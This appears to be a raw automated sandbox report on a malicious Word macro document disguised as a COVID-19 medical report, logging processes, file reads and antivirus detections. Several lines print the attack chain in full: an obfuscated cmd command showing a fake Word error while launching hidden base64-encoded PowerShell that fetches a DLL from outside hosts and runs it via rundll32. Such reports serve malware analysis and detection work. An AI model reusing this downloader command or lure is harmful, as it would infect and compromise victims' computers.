Source: VBA code instrumentation OLE, VBA macro: Module Kyl0l3rqw280c6ssa, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: XP-9743 Medical report COVID-19.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@26/7@2/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp Jump to behavior
Source: XP-9743 Medical report COVID-19.doc OLE indicator, Word Document stream: true
Source: XP-9743 Medical report COVID-19.doc OLE document summary: title field not present or empty
Source: XP-9743 Medical report COVID-19.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............d........................... .V.......V.....................H...............#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............d...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v.....,......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... u...............u.............}..v.... -......0.................j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v.....9......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....x.j...............u.............}..v....x:......0.................j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............M..j......................u.............}..v.... h......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............M..j..... u...............u.............}..v.....h......0...............H.j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j......................u.............}..v.... .......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j......................u.............}..v.... .......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............}..j....`Kj...............u.............}..v.....%......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....&................u.............}..v.... '......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....8+......0................Hj.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j.....+................u.............}..v....p,......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.4.............}..v.....0......0................Hj.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j....81................u.............}..v.....1......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............}..j....`Kj...............u.............}..v.....8......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j....89................u.............}..v.....9......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....@......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8A................u.............}..v.....A......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....H......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8I................u.............}..v.....I......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....P......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8Q................u.............}..v.....Q......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....X......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8Y................u.............}..v.....Y......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....`......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8a................u.............}..v.....a......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....h......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8i................u.............}..v.....i......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....p......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8q................u.............}..v.....q......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v.....x......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8y................u.............}..v.....y......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....8.................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....0.......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................}..j....`Kj...............u.............}..v....`.......0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v............0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......}..j....`Kj...............u.............}..v....(.......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....`.......0................Hj............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....(................u.............}..v.....^......0...............x.j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....(................u.............}..v....H.......0...............x.j............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: XP-9743 Medical report COVID-19.doc Virustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.doc ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAF